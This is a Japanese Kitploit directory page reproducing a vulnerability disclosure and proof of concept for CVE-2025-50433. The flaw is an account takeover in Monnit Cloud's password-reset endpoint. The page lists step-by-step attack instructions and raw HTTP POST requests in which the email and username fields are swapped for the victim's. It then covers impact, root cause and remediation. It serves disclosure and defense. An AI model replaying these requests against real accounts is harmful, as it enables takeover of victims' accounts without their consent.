Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50433 — # 重大なMonnit Cloudアカウント乗っ取り(CVE-2025-50433)の概念実証 パスワードリセットにおけるトークンとメールの検証欠如を悪用し、攻撃手順、根本原因、および是正策を提供します。 | Kitploit
ツール/GitHubGitHub/0xmandor/cve-2025-50433
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト認証
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

# 重大なMonnit Cloudアカウント乗っ取り(CVE-2025-50433)の概念実証 パスワードリセットにおけるトークンとメールの検証欠如を悪用し、攻撃手順、根本原因、および是正策を提供します。

リポジトリを見る
19ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-50433 — Monnit Cloud Platforms(*.imonnit.com)に影響する重大なアカウント乗っ取り脆弱性

概要

*.imonnit.com 全体にわたる重大な認証脆弱性が存在し、 被害者の操作なしに任意のユーザアカウントの**完全なアカウント乗っ取り(ATO)**を可能にします。

バックエンドはパスワードリセットトークンと対象メールアドレスとの関連付けを検証しないため、 攻撃者は自身の有効なリセットトークンを使用して任意の被害者アカウントのパスワードをリセットできます。


攻撃ベクトル(段階的なPoC)

  1. 攻撃者はアカウントA([email protected])を作成する。
  2. 被害者はアカウントB([email protected])を持っている。
  3. 攻撃者はAとBの両方に対してパスワードリセットを要求する。
  4. 攻撃者はアカウントAの有効なリセットトークンのみを受け取る。
  5. 攻撃者はトークンAを使用してパスワードリセットフォームを開く:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. 送信する前に、攻撃者はメールアドレスとユーザ名フィールドを被害者のものに変更する:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. バックエンドは誤って不一致のメールアドレスとトークンを受け入れる。
  2. 被害者のパスワードがリセットされ、攻撃者は被害者のアカウントへの完全なアクセス権を得る。

影響

  • 完全なアカウント乗っ取り(ATO)。
  • 被害者のダッシュボード、センサー、アカウントデータへの完全なアクセス。
  • デバイス、通知、設定の変更が可能。
  • 被害者の操作なしで権限昇格が可能。
  • 前提条件なしでリモートからの悪用が可能。

深刻度

CVSS 3.1: 9.8 (重大)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


影響を受けるドメイン

root@kitploit:~
*.imonnit.com

根本原因

パスワードリセットエンドポイントは、リセット操作中に提供された電子メールと同じメールアドレスにリセットトークンが属していることを検証しないため、攻撃者が制御するトークンを使用して任意のパスワードリセットが可能になります。


影響を受けるエンドポイント

root@kitploit:~
/Account/PasswordReset/

ベンダー: Monnit Corporation


推奨事項

  • バックエンドで厳格なトークン–メールバインディング検証を実施する。
  • トークンが関連アカウントと一致しないパスワードリセット要求はすべて拒否する。
  • 使用後は直ちにトークンを無効化する。

発見者

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

ツールをダウンロード